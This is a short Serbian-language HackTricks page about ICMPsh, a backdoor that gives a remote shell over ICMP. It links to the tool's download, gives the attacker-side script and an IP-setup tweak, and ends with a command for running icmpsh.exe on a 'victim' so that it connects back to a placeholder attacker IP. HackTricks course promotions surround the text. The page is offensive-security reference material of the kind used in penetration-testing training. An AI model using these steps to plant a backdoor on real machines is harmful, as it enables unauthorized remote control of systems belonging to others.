ICMPsh

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Preuzmite backdoor sa: https://github.com/inquisb/icmpsh

Klijentska strana

Izvršite skriptu: run.sh

Ako dobijete neku grešku, pokušajte da promenite linije:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

Za:

echo Please insert the IP where you want to listen
read IP

Strana žrtve

Postavite icmpsh.exe na žrtvu i izvršite:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Last updated